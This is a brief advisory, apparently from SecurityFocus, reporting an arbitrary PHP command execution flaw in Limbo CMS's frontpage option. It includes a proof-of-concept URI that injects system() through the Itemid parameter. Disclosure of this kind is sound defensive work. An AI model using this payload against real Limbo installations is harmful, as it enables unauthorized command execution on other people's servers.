Limbo CMS Frontpage Arbitrary PHP Command Execution Vulnerability

This issue can be exploited through a web client.

The following proof-of-concept URI is available:

http://www.example.com/path-to-limbo/index.php?option=frontpage&Itemid=system()


 

Privacy Statement
Copyright 2010, SecurityFocus